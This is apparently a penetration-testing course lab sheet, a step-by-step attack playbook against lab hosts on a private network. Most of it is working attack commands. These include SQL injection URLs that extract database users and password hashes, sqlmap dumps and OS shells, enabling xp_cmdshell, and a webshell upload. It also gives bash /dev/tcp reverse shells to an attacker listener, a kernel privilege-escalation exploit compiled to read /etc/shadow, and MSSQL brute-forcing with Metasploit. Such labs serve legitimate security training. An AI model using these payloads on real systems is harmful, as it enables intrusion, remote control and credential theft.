joemccray

Web App Lab Norway

Sep 7th, 2016
  1. #################
  2. # SQL Injection #
  3. #################
  4.  
  5.  
  6. http://10.250.100.221/
  7. http://10.250.100.221/bookdetail.aspx?id=2
  8. http://10.250.100.221/bookdetail.aspx?id=2'
  9. http://10.250.100.221/bookdetail.aspx?id='
  10.  
  11.  
  12. http://10.250.100.221/bookdetail.aspx?id=(2)
  13. http://10.250.100.221/bookdetail.aspx?id=(4-2)
  14. http://10.250.100.221/bookdetail.aspx?id=(4-1)
  15.  
  16.  
  17.  
  18. http://10.250.100.221/bookdetail.aspx?id=2 or 1=1--
  19. http://10.250.100.221/bookdetail.aspx?id=2 or 1=2--
  20. http://10.250.100.221/bookdetail.aspx?id=1*1
  21. http://10.250.100.221/bookdetail.aspx?id=2 or 1 >-1#
  22. http://10.250.100.221/bookdetail.aspx?id=2 or 1<99#
  23. http://10.250.100.221/bookdetail.aspx?id=2 or 1<>1#
  24. http://10.250.100.221/bookdetail.aspx?id=2 or 2 != 3--
  25. http://10.250.100.221/bookdetail.aspx?id=2 &0#
  26.  
  27.  
  28.  
  29. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  30. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  31. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  32. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  33. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  34. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  35. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  36. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  37. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  38. http://10.250.100.221/bookdetail.aspx?id=2 order by 100--
  39. http://10.250.100.221/bookdetail.aspx?id=2 order by 50--
  40. http://10.250.100.221/bookdetail.aspx?id=2 order by 25--
  41. http://10.250.100.221/bookdetail.aspx?id=2 order by 10--
  42. http://10.250.100.221/bookdetail.aspx?id=2 order by 5--
  43. http://10.250.100.221/bookdetail.aspx?id=2 order by 6--
  44. http://10.250.100.221/bookdetail.aspx?id=2 order by 7--
  45. http://10.250.100.221/bookdetail.aspx?id=2 order by 8--
  46. http://10.250.100.221/bookdetail.aspx?id=2 order by 9--
  47. http://10.250.100.221/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  48. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  49. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  50. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  51. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  52. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins-- NOTE: password_hash in sys.sql_logins is only returned to logins with CONTROL SERVER-level rights; if that column comes back empty the application's DB login simply lacks the permission - the injection itself is still working
  53.  
  54.  
  55.  
  56. ###############################
  57. # Blind SQL Injection Testing #
  58. ###############################
  59. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  60.  
  61. 3 - Total Characters
  62. http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  63. http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  64. http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  65.  
  66. D - 1st Character
  67. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  68. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  69. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  70. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  71.  
  72. B - 2nd Character
  73. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  74. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  75.  
  76. O - 3rd Character
  77. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  78. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  79. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  80. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  81. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  82. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds; 'o' is ASCII 111 - the line as originally pasted tested =110, which is 'n', and would not delay)
  83.  
  84.  
  85.  
  86. ##########
  87. # Sqlmap #
  88. ##########
  89. cd /home/strategicsec/toolz/sqlmap-dev/
  90. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -b
  91. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --current-user
  92. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --current-db
  93. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --dbs
  94. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp --tables
  95. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
  96. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
  97. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
  98. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
  99. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --users --passwords
  100.  
  101.  
  102.  
  103.  
  104.  
  105. Enabling xp_cmdshell (in your web browser type the following URL - this relies on stacked queries and only works if the application's database login has sysadmin-level rights to run sp_configure)
  106. http://10.250.100.221/bookdetail.aspx?id=2;exec master..sp_configure 'show advanced options',1;reconfigure;exec master..sp_configure 'xp_cmdshell',1;reconfigure--
  107.  
  108. ##############################################
  109. # Executing System Commands With xp_cmdshell #
  110. ##############################################
  111.  
  112. Go to the address below in firefox:
  113. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--
  114.  
  115.  
  116. Go to the address below in firefox:
  117. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\dir_yourname-was-here.txt'--
  118.  
  119.  
  120.  
  121. Check it
  122. --------
  123. http://10.250.100.221/dir_yourname-was-here.txt
  124.  
  125.  
  126.  
  127.  
  128. Go to the address below in firefox:
  129. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'ipconfig+>+c:\inetpub\wwwroot\ipconfig_yourname-was-here.txt'--
  130.  
  131.  
  132.  
  133. Check it
  134. --------
  135. http://10.250.100.221/ipconfig_yourname-was-here.txt
  136.  
  137.  
  138.  
  139.  
  140. Go to the address below in firefox:
  141. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'netstat+>+c:\inetpub\wwwroot\netstat_yourname-was-here.txt'--
  142.  
  143.  
  144.  
  145.  
  146.  
  147. Check it
  148. --------
  149. http://10.250.100.221/netstat_yourname-was-here.txt
  150.  
  151.  
  152.  
  153. -----------------Some Manual Testing-----------------
  154.  
  155. Go to LAMP Target homepage
  156. http://10.250.100.115/
  157.  
  158. - Ask yourself the 3 web questions
  159.  
  160. 1. Does the website talk to a DB?
  161. - Look for parameter passing (ex: site.com/page.php?id=4)
  162. - If yes - try SQL Injection
  163.  
  164. 2. Can I or someone else see what I type?
  165.  
  166. 3. Does the page reference a file?
  167.  
  168.  
  169.  
  170.  
  171. Clicking on the Acer Link:
  172. http://10.250.100.115/acre2.php?lap=acer
  173.  
  174. - Found parameter passing (answer yes to question 1)
  175. - Insert ' to test for SQLI
  176.  
  177. http://10.250.100.115/acre2.php?lap=acer'
  178.  
  179.  
  180. Page returns the following error:
  181. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  182.  
  183.  
  184.  
  185. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  186. We do this using the ORDER BY
  187. http://10.250.100.115/acre2.php?lap=acer' order by 100-- +
  188.  
  189. Page returns the following error:
  190. Unknown column '100' in 'order clause'
  191.  
  192.  
  193.  
  194. http://10.250.100.115/acre2.php?lap=acer' order by 50-- +
  195.  
  196.  
  197.  
  198. Now we replace the parameter value 'acer' with the word 'null' - a value that presumably matches no row - so the original query returns nothing and only the rows from our UNION SELECT are displayed:
  199. http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  200.  
  201. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  202.  
  203.  
  204.  
  205.  
  206. Use a cheat sheet for syntax:
  207. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  208.  
  209.  
  210.  
  211. http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  212.  
  213.  
  214.  
  215. http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  216.  
  217. Page returns the following error:
  218. Unknown column '50' in 'order clause'   (this error belongs to the "order by 50" request above, not to the union queries)
  219.  
  220.  
  221.  
  222.  
  223.  
  224. http://10.250.100.115/acre2.php?lap=acer' order by 25-- +
  225. Page returns the following error:
  226. Unknown column '25' in 'order clause'
  227.  
  228.  
  229.  
  230. http://10.250.100.115/acre2.php?lap=acer' order by 5-- +
  231. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  232.  
  233.  
  234.  
  235. Now we build out the union all select statement with the correct number of columns
  236.  
  237. Reference:
  238. http://www.techonthenet.com/sql/union.php
  239.  
  240.  
  241.  
  242. http://10.250.100.115/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  243.  
  244.  
  245.  
  246.  
  247.  
  248. http://10.250.100.115/acre2.php?lap=acer' union all select 1,2,3,user,password,6 from mysql.user -- a     (on MySQL 5.7 and later the hash column is authentication_string rather than password - if this errors with Unknown column 'password', use that name instead)
  249.  
  250.  
  251.  
  252.  
  253.  
  254.  
  255.  
  256. Here we see that we do not have parameter passing, but we can see what we type (a yes to question 2).
  257. http://10.250.100.115/career.php
  258.  
  259. Tried XSS, but that didn't work - then noticed that we can upload a file.
  260.  
  261. Go to http://www.open-labs.org/
  262.  
  263. Download yourname_webkit
  264.  
  265. http://www.open-labs.org/yourname_webkit02.tar.gz
  266.  
  267. Upload cmd.php or list.php...now you have to find it!!!!! Where is it????
  268.  
  269.  
  270. Tried a bunch of dirs - finally found it in /resume:
  271. http://10.250.100.115/resume/cmd.php
  272.  
  273. Try the following commands:
  274. /sbin/ifconfig
  275.  
  276. uname -a
  277.  
  278. id
  279.  
  280. cat /etc/passwd
  281.  
  282.  
  283.  
  284.  
  285.  
  286. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  287. http://10.250.100.115/showfile.php?filename=about.txt
  288.  
  289.  
  290.  
  291. See if you can read files on the file system:
  292. http://10.250.100.115/showfile.php?filename=/etc/passwd
  293.  
  294.  
  295.  
  296.  
  297. -----------------Some Automated Testing-----------------
  298.  
  299. cd /home/strategicsec/toolz/sqlmap-dev/
  300.  
  301. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" -b -v 3
  302.  
  303.  
  304. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --current-user -v 3
  305.  
  306.  
  307. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --current-db -v 3
  308.  
  309.  
  310. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --privileges -v 3
  311.  
  312.  
  313. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --dbs -v 3
  314.  
  315.  
  316. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --tables -v 3
  317.  
  318.  
  319. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/issue -v 3
  320.  
  321.  
  322. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
  323.  
  324.  
  325.  
  326. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --os-shell -v 3
  327. 3
  328. /var/www/html/
  329. /var/www/html/uploads/
  330.  
  331.  
  332. id
  333. Y
  334.  
  335. ls -lsa
  336. Y
  337.  
  338. uname -a
  339. Y
  340.  
  341.  
  342.  
  343.  
  344.  
  345. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --os-pwn --msf-path=/home/strategicsec/toolz/metasploit/ -v 3
  346. 3
  347. /var/www/html/
  348. /var/www/html/uploads/
  349. /sbin/ifconfig
  350. Y
  351.  
  352.  
  353.  
  354.  
  355. -----------------Some homework-----------------
  356.  
  357. 1. Do all of the labs in the https://s3.amazonaws.com/StrategicSec-Files/LAMP-WebAppLabs.pdf document
  358.  
  359.  
  360. -----------------Challenge-----------------
  361. 1. Root this box!
  362.  
  363. Send me a word document with screenshots proving that you did all of the exercises.
  364.  
  365.  
  366.  
  367.  
  368.  
  369. ###################################
  370. # Root Method 1: Find Credentials #
  371. ###################################
  372.  
  373. http://10.250.100.115/resume/cmd.php
  374.  
  375. ls -lsa
  376.  
  377. ls -lsa /var/www/html/
  378.  
  379.  
  380. Find a file called dbconnect.php
  381.  
  382. cat /var/www/html/dbconnect.php
  383.  
  384. or
  385.  
  386. http://10.250.100.115/showfile.php?filename=dbconnect.php
  387.  
  388.  
  389.  
  390. ssh into host with the credentials you find
  391. (note: This is a shot in the dark. The mysql root user pass is not always the same as the real root pass.)
  392.  
  393.  
  394.  
  395.  
  396. #######################################
  397. # Root Method 2: Privilege Escalation #
  398. #######################################
  399.  
  400. start listener on your machine
  401. ncat -l -v -p 1234
  402.  
  403.  
  404.  
  405. Go back to uploaded webshell
  406. http://10.250.100.115/resume/cmd.php
  407.  
  408.  
  409.  
  410.  
  411. bash -i >& /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/1234 0>&1
  412.  
  413.  
  414. id
  415. uname -a
  416. pwd
  417.  
  418.  
  419.  
  420.  
  421. cd /tmp
  422.  
  423.  
  424.  
  425. cat >> yourname.c << out    <-------------- paste in the exploit code text from the exploit-db.com link below, then type out on a line by itself to close the heredoc (note: >> appends, so delete yourname.c first if you re-run this)
  426.  
  427.  
  428.  
  429.  
  430. http://www.exploit-db.com/exploits/9479/    (a kernel local privilege-escalation exploit: compare the output of uname -a against the affected-version list on that page before compiling - a kernel exploit run against the wrong version can crash the target instead of escalating)
  431.  
  432.  
  433.  
  434. gcc -o yourname yourname.c
  435.  
  436.  
  437. ./yourname
  438.  
  439.  
  440. id
  441.  
  442. cat /etc/shadow
  443.  
  444.  
  445. #########################################
  446. # Simple Linux Post Exploitation Tricks #
  447. #########################################
  448.  
  449.  
  450.  
  451.  
  452. Linux Lab 1:
  453. ------------
  454. On your Windows host type this:
  455.  
  456. ncat -l -vv -p 4321 > see.txt
  457.  
  458.  
  459. On your Linux host type this:
  460.  
  461. echo "see this" > /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/4321
  462.  
  463.  
  464.  
  465.  
  466.  
  467. Linux Lab 2:
  468. ------------
  469. On your Windows host type this:
  470.  
  471. ncat -l -vv -p 1234
  472.  
  473.  
  474.  
  475. On your Linux host type this:
  476. /bin/bash -i > /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/1234 0<&1 2>&1
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483. Linux Lab 3:
  484. ------------
  485.  
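  # Bash-only TCP connect sweep of ports 1-1023 on the target, appending hits to /tmp/ports.txt.
  # The connect attempt runs in a subshell with stderr discarded, so bash's "Connection refused"
  # messages no longer flood the terminal, and success is tested with the && chain instead of $?.
  # Caveat: /dev/tcp gives no control over the connect timeout, so expect stalls on filtered ports.
  port=1; while [ $port -lt 1024 ]; do (echo > /dev/tcp/10.250.100.221/$port) >/dev/null 2>&1 && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done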
  487.  
  488.  
  489. cat /tmp/ports.txt
  490.  
  491.  
  492.  
  493.  
  494.  
  495. Linux Lab 3a:
  496. -------------
  497.  
  # Same sweep as Lab 3, written as a while loop: ports 0-1023, print "<port> open" on a
  # successful connect; stderr for the whole loop is discarded so refused connections stay silent.
  i=0
  while (( i < 1024 )); do
    echo >/dev/tcp/10.250.100.221/$i && echo $i open
    (( i++ ))
  done 2>/dev/null
  501.  
  502.  
  503.  
  504. Linux Lab 3b:
  505. -------------
  506.  
  # Lab 3 sweep once more, with a C-style counter: ports 1-1023, each connect attempted in a
  # subshell with its output discarded, printing "<port> open" only when the connect succeeds.
  for ((p = 1; p <= 1023; p++)); do
    (echo >/dev/tcp/10.250.100.221/$p) >/dev/null 2>&1 && echo "$p open"
  done
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517. Lab 4:
  518. ------
  519. On your Windows host type this:
  520. ncat -l -vv -p 31337 (command shell window 1)
  521. ncat -l -vv -p 1337 (command shell window 2)
  522.  
  523.  
  524. On your Linux host type this:
  525. telnet StrategicSec-Ubuntu-VM-Bridged-IP 31337 | /bin/bash | telnet StrategicSec-Ubuntu-VM-Bridged-IP 1337
  526.  
  527.  
  528.  
  529.  
  530.  
  531.  
  532.  
  533.  
  534.  
  535. Type commands on the 31337 listener, and see the output on the 1337 listener
  536.  
  537.  
  538.  
  539.  
  540.  
  541. ----------------------------------------------------------------------------------
  542. Lab 3a: Identifying MSSQL Server
  543.  
  544. propecia 10.250.100 1433
  545.  
  546. Lab 3b: Determine the Version
  547. nmap -sV -p 1433 10.250.100.221
  548. nmap -sV -p 1433 --script=ms-sql-info 10.250.100.221
  549.  
  550.  
  551. Lab 3c: Bruteforcing MSSQL
  552. nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 10.250.100.221
  553. nmap -p 1433 --script ms-sql-brute 10.250.100.221
  554. Neither one of these worked as pasted: the second command originally used Unicode en-dashes (–p, –script) instead of ASCII hyphens, which nmap does not parse as options - retype the dashes if you copy it from elsewhere.
  555.  
  556.  
  557. Lab 3d: Extracting Data From MSSQL
  558. nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database 10.250.100.221
  559.  
  560. nmap -sV -p 1433 10.250.100.1-254
  561.  
  562. MSSQL
  563. ---------
  564. propecia 10.10.10 1433
  565. ./sqlcmd 10.250.100.221:1433
  566.  
  567. NMAP
  568. nmap -p1433 --script ms-sql-info 10.250.100.221
  569. nmap -p1433 --script ms-sql-empty-password 10.250.100.221
  570. nmap -p1433 --script ms-sql-brute 10.250.100.221
  571. nmap -p1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=pass.txt 10.250.100.221
  572. nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa 10.250.100.221
  573. nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa 10.250.100.221
  574. nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa 10.250.100.221
  575. nmap -p1433 --script ms-sql-xp-cmdshell --script-args=ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa 10.250.100.221
  576. nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa 10.250.100.221
  577.  
  578.  
  579.  
  580.  
  581.  
  582. Lab 3e: Attacking MSSQL Server With Metasploit
  583.  
  584. cd ~/toolz/metasploit
  585.  
  586. ./msfconsole
  587.  
  588. use auxiliary/admin/mssql/mssql_sql
  589.  
  590. show options
  591.  
  592. set RHOST 10.250.100.221
  593.  
  594. set username sa
  595.  
  596. set password database
  597.  
  598. exploit
  599.  
  600.  
  601.  
  602.  
  603.  
  604.  
  605.  
  606.  
  607.  
  608. use auxiliary/admin/mssql/mssql_enum
  609.  
  610. show options
  611.  
  612. set RHOST 10.250.100.221
  613.  
  614. set username sa
  615.  
  616. set password database
  617.  
  618. exploit
  619.  
  620.  
  621.  
  622.  
  623.  
  624. use auxiliary/admin/mssql/mssql_exec
  625.  
  626. show options
  627.  
  628. set RHOST 10.250.100.221
  629.  
  630. set password database
  631.  
  632. set CMD cmd.exe /c ping localhost
  633.  
  634. exploit
  635.  
  636.  
  637.  
  638.  
  639.  
  640. use auxiliary/scanner/mssql/mssql_ping
  641. set RHOSTS 10.250.100.221
  642. run
  643.  
  644. use auxiliary/admin/mssql/mssql_enum
  645. set RHOSTS 10.250.100.221
  646. run
  647.  
  648. set CMD 'ipconfig'   (CMD is an option of auxiliary/admin/mssql/mssql_exec, not mssql_enum - run use auxiliary/admin/mssql/mssql_exec first, as in the block above)
  649. run
  650.  
  651.  
  652.  
  653.  
  654.  
  655. MS-SQL
  656. nmap -sV -p 1433 --script=ms-sql-info 10.250.100.221
  657.  
  658. nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=userlist.txt,passdb=passwordlist.txt 10.250.100.221
  659.  
  660. nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database 10.250.100.221
  661.  
  662.  
  663.  
  664. MySQL